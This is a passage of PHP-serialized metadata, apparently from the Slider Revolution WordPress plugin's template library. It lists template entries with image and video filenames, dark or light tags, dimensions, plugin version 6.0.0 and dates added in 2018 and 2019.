File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:369;a:13:{s:2:\"id\";s:3:\"339\";s:6:\"handle\";s:19:\"best_price_dark.jpg\";s:5:\"video\";s:19:\"best_price_dark.mp4\";s:4:\"name\";s:15:\"best_price_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"best_price_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:370;a:13:{s:2:\"id\";s:3:\"337\";s:6:\"handle\";s:27:\"limited_time_offer_dark.jpg\";s:5:\"video\";s:27:\"limited_time_offer_dark.mp4\";s:4:\"name\";s:23:\"limited_time_offer_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:23:\"limited_time_offer_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:371;a:13:{s:2:\"id\";s:3:\"336\";s:6:\"handle\";s:26:\"slider_revolution_dark.jpg\";s:5:\"video\";s:26:\"slider_revolution_dark.mp4\";s:4:\"name\";s:22:\"slider_revolution_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:22:\"slider_revolution_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:372;a:13:{s:2:\"id\";s:3:\"335\";s:6:\"handle\";s:19:\"mick_brown_dark.jpg\";s:5:\"video\";s:19:\"mick_brown_dark.mp4\";s:4:\"name\";s:15:\"mick_brown_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"mick_brown_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:373;a:13:{s:2:\"id\";s:3:\"334\";s:6:\"handle\";s:14:\"sales_dark.jpg\";s:5:\"video\";s:14:\"sales_dark.mp4\";s:4:\"name\";s:10:\"sales_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:10:\"sales_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:374;a:13:{s:2:\"id\";s:3:\"333\";s:6:\"handle\";s:21:\"robert_smith_dark.jpg\";s:5:\"video\";s:21:\"robert_smith_dark.mp4\";s:4:\"name\";s:17:\"robert_smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"robert_smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:375;a:13:{s:2:\"id\";s:3:\"332\";s:6:\"handle\";s:21:\"product_name_dark.jpg\";s:5:\"video\";s:21:\"product_name_dark.mp4\";s:4:\"name\";s:17:\"product_name_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"product_name_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:376;a:13:{s:2:\"id\";s:3:\"331\";s:6:\"handle\";s:21:\"high_quality_dark.jpg\";s:5:\"video\";s:21:\"high_quality_dark.mp4\";s:4:\"name\";s:17:\"high_quality_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"high_quality_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:377;a:13:{s:2:\"id\";s:3:\"330\";s:6:\"handle\";s:24:\"robert_johnson_light.jpg\";s:5:\"video\";s:24:\"robert_johnson_light.mp4\";s:4:\"name\";s:20:\"robert_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"robert_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:378;a:13:{s:2:\"id\";s:3:\"329\";s:6:\"handle\";s:21:\"jake_collins_dark.jpg\";s:5:\"video\";s:21:\"jake_collins_dark.mp4\";s:4:\"name\";s:17:\"jake_collins_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"jake_collins_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:379;a:13:{s:2:\"id\";s:3:\"328\";s:6:\"handle\";s:22:\"daniele_wood_light.jpg\";s:5:\"video\";s:22:\"daniele_wood_light.mp4\";s:4:\"name\";s:18:\"daniele_wood_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"daniele_wood_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:31:30\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:380;a:13:{s:2:\"id\";s:3:\"327\";s:6:\"handle\";s:23:\"michael_blake_light.jpg\";s:5:\"video\";s:23:\"michael_blake_light.mp4\";s:4:\"name\";s:19:\"michael_blake_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"michael_blake_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:381;a:13:{s:2:\"id\";s:3:\"326\";s:6:\"handle\";s:22:\"product_name_light.jpg\";s:5:\"video\";s:22:\"product_name_light.mp4\";s:4:\"name\";s:18:\"product_name_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"product_name_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:382;a:13:{s:2:\"id\";s:3:\"325\";s:6:\"handle\";s:24:\"rebecca_cooper_light.jpg\";s:5:\"video\";s:24:\"rebecca_cooper_light.mp4\";s:4:\"name\";s:20:\"rebecca_cooper_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"rebecca_cooper_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:383;a:13:{s:2:\"id\";s:3:\"324\";s:6:\"handle\";s:28:\"limited_time_offer_light.jpg\";s:5:\"video\";s:28:\"limited_time_offer_light.mp4\";s:4:\"name\";s:24:\"limited_time_offer_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:24:\"limited_time_offer_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:384;a:13:{s:2:\"id\";s:3:\"322\";s:6:\"handle\";s:22:\"jake_michael_light.jpg\";s:5:\"video\";s:22:\"jake_michael_light.mp4\";s:4:\"name\";s:18:\"jake_michael_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"jake_michael_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:385;a:13:{s:2:\"id\";s:3:\"321\";s:6:\"handle\";s:23:\"colin_johnson_light.jpg\";s:5:\"video\";s:23:\"colin_johnson_light.mp4\";s:4:\"name\";s:19:\"colin_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"colin_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:386;a:13:{s:2:\"id\";s:3:\"320\";s:6:\"handle\";s:21:\"colin_morris_dark.jpg\";s:5:\"video\";s:21:\"colin_morris_dark.mp4\";s:4:\"name\";s:17:\"colin_morris_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"colin_morris_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:387;a:13:{s:2:\"id\";s:3:\"319\";s:6:\"handle\";s:22:\"justin_cooper_dark.jpg\";s:5:\"video\";s:22:\"justin_cooper_dark.mp4\";s:4:\"name\";s:18:\"justin_cooper_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"justin_cooper_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:388;a:13:{s:2:\"id\";s:3:\"318\";s:6:\"handle\";s:21:\"james-dodson_dark.jpg\";s:5:\"video\";s:21:\"james-dodson_dark.mp4\";s:4:\"name\";s:17:\"james-dodson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"james-dodson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:389;a:13:{s:2:\"id\";s:3:\"317\";s:6:\"handle\";s:23:\"robert_sanders_dark.jpg\";s:5:\"video\";s:23:\"robert_sanders_dark.mp4\";s:4:\"name\";s:19:\"robert_sanders_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"robert_sanders_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:390;a:13:{s:2:\"id\";s:3:\"316\";s:6:\"handle\";s:21:\"emily_carney_dark.jpg\";s:5:\"video\";s:21:\"emily_carney_dark.mp4\";s:4:\"name\";s:17:\"emily_carney_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"emily_carney_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:391;a:13:{s:2:\"id\";s:3:\"315\";s:6:\"handle\";s:22:\"michael-smith_dark.jpg\";s:5:\"video\";s:22:\"michael-smith_dark.mp4\";s:4:\"name\";s:18:\"michael-smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"michael-smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:392;a:13:{s:2:\"id\";s:3:\"314\";s:6:\"handle\";s:23:\"sandra_johnson_dark.jpg\";s:5:\"video\";s:23:\"sandra_johnson_dark.mp4\";s:4:\"name\";s:19:\"sandra_johnson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"sandra_johnson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:393;a:13:{s:2:\"id\";s:3:\"313\";s:6:\"handle\";s:22:\"robert_bolton_dark.jpg\";s:5:\"video\";s:22:\"robert_bolton_dark.mp4\";s:4:\"name\";s:18:\"robert_bolton_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"robert_bolton_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:394;a:13:{s:2:\"id\";s:3:\"312\";s:6:\"handle\";s:25:\"elegant_captions_dark.png\";s:5:\"video\";s:25:\"elegant_captions_dark.mp4\";s:4:\"name\";s:21:\"elegant_captions_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:21:\"elegant_captions_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-18 14:41:45\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:395;a:13:{s:2:\"id\";s:3:\"311\";s:6:\"handle\";s:19:\"Caption_Dark_06.png\";s:5:\"video\";s:19:\"Caption_Dark_06.mp4\";s:4:\"name\";s:15:\"Caption_Dark_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_06\";s:5:\"width\";s:3:\"414\";s:6:\"height\";s:3:\"225\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:396;a:13:{s:2:\"id\";s:3:\"310\";s:6:\"handle\";s:19:\"Header_Light_02.png\";s:5:\"video\";s:19:\"Header_Light_02.mp4\";s:4:\"name\";s:15:\"Header_Light_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:397;a:13:{s:2:\"id\";s:3:\"309\";s:6:\"handle\";s:21:\"Columns_4_Dark_01.png\";s:5:\"video\";s:21:\"Columns_4_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_4_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_4_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:398;a:13:{s:2:\"id\";s:3:\"308\";s:6:\"handle\";s:18:\"Header_Dark_01.png\";s:5:\"video\";s:18:\"Header_Dark_01.mp4\";s:4:\"name\";s:14:\"Header_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:399;a:13:{s:2:\"id\";s:3:\"307\";s:6:\"handle\";s:19:\"Caption_Dark_03.png\";s:5:\"video\";s:19:\"Caption_Dark_03.mp4\";s:4:\"name\";s:15:\"Caption_Dark_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:400;a:13:{s:2:\"id\";s:3:\"306\";s:6:\"handle\";s:21:\"Columns_3_Dark_01.png\";s:5:\"video\";s:21:\"Columns_3_Dark_01.mp4\";s:4:\"name\";s:17:\"Columns_3_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"Columns_3_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:401;a:13:{s:2:\"id\";s:3:\"305\";s:6:\"handle\";s:19:\"Caption_Dark_05.png\";s:5:\"video\";s:19:\"Caption_Dark_05.mp4\";s:4:\"name\";s:15:\"Caption_Dark_05\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_05\";s:5:\"width\";s:4:\"1104\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:402;a:13:{s:2:\"id\";s:3:\"304\";s:6:\"handle\";s:20:\"Caption_Light_06.png\";s:5:\"video\";s:20:\"Caption_Light_06.mp4\";s:4:\"name\";s:16:\"Caption_Light_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_06\";s:5:\"width\";s:3:\"828\";s:6:\"height\";s:3:\"450\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:403;a:13:{s:2:\"id\";s:3:\"303\";s:6:\"handle\";s:19:\"Header_Light_01.png\";s:5:\"video\";s:19:\"Header_Light_01.mp4\";s:4:\"name\";s:15:\"Header_Light_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:15:\"Header_Light_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:404;a:13:{s:2:\"id\";s:3:\"302\";s:6:\"handle\";s:20:\"Caption_Light_03.png\";s:5:\"video\";s:20:\"Caption_Light_03.mp4\";s:4:\"name\";s:16:\"Caption_Light_03\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:16:\"Caption_Light_03\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:405;a:13:{s:2:\"id\";s:3:\"301\";s:6:\"handle\";s:19:\"Caption_Dark_01.png\";s:5:\"video\";s:19:\"Caption_Dark_01.mp4\";s:4:\"name\";s:15:\"Caption_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:406;a:13:{s:2:\"id\";s:3:\"300\";s:6:\"handle\";s:21:\"PromoCode_Dark_01.png\";s:5:\"video\";s:21:\"PromoCode_Dark_01.mp4\";s:4:\"name\";s:17:\"PromoCode_Dark_01\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"PromoCode_Dark_01\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:407;a:13:{s:2:\"id\";s:3:\"299\";s:6:\"handle\";s:19:\"Caption_Dark_02.png\";s:5:\"video\";s:19:\"Caption_Dark_02.mp4\";s:4:\"name\";s:15:\"Caption_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 13:18:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:408;a:13:{s:2:\"id\";s:3:\"298\";s:6:\"handle\";s:18:\"Header_Dark_02.png\";s:5:\"video\";s:18:\"Header_Dark_02.mp4\";s:4:\"name\";s:14:\"Header_Dark_02\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:14:\"Header_Dark_02\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 